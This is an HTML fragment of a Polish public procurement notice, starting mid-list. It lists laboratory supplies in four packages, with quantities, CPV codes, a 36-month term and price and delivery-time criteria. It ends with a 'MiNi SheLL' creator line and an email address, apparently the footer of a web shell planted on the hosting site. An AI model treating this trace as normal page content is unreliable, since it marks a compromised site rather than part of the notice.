sterylne - 5000 szt., Czasomierz/stoper laboratoryjny - 5 szt., Statyw obrotowy, 8 miejscowy do pipet 1, 8, 12 kanałowych - 2 szt., Pudełko na 25 preparatów mikroskopowych - 2 szt., Pudełko z ABS na 10 preparatów mikroskopowych - 1 szt., Statyw na 40 probówek o średnicy 16-20 mm - 4 szt., Statyw na 10 probówek o średnicy 18 mm - 2 szt., Statyw na 10 probówek o średnicy 16 mm - 4 szt., Penseta z metalu - 4 szt., Penseta z metalu o ostrych, wygiętych końcach o długości 130 mm - 3 szt., Penseta z metalu o tępych końcach o długości 130 mm - 2 szt., Pojemniki do dobowej zbiórki moczu poj. 2-2,5l - 2000 szt. Butelki z PP pojemność 250 ml - 20 szt., Butelki z PP pojemność 100 ml - 5 szt., Probówki wirówkowe szklane 25 ml. - 200 szt., Probówki wirówkowe szklane, poj. 50 ml. - 200 szt., Probówki okrągłodenne, szkło borokszemianowe, zakręcane nakrętką, poj. 50ml - 200 szt., Kulki szklane, średnica 1,5-2 mm - 2 kg., Kolby stożkowe szklane poj. 500 ml - 50 szt., Cylindry szklane poj.100 ml - 5 szt., Cylindry szklane poj. 25ml - 5 szt., Cylindry szklane poj. 50ml - 50 szt., Koperty ochronne C13 na 4 szkiełka - 460 szt., Lejki szklane średnica 16 cm - 5 szt., Pudełka do szkiełek mikroskopowych - 260 szt., Kolby kuliste poj. 4l - 20 szt., Probówki wirówkowe typu Eppendorfa o pojemności 1,5 ml - 30000 szt., Probówki wirówkowe typu Eppendorfa o pojemności 0,5 ml - 30000 szt., Probówka 0,2 ml do PCR - 5000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 33.79.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy. - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2:	Mikro płytki reakcyjne - płytki z 96 dołkami o pojemności 0,2 ml - 8 op., Nakrywki do płytek z poz. 1 - 4 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy. - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 3:	Pojemnik o pojemności 0,7-0,8 litra owalny - 3000 szt., Pojemnik o pojemności 0,7-0,8 litra o podstawie okręgu - 3000 szt., Pojemnik o pojemności 1,0-litra - 8000szt., Pojemnik o pojemności 1,0-litra - 16000 szt., Pojemnik o pojemności 2,5- 2,6 litra - 1500 szt., Pojemnik o pojemności 3,0 - 3,5 litra - 3000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy. - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 4:	Kasetki histopatologiczne - 60 000 szt., Kasetki histopatologiczne - 40 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy. - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com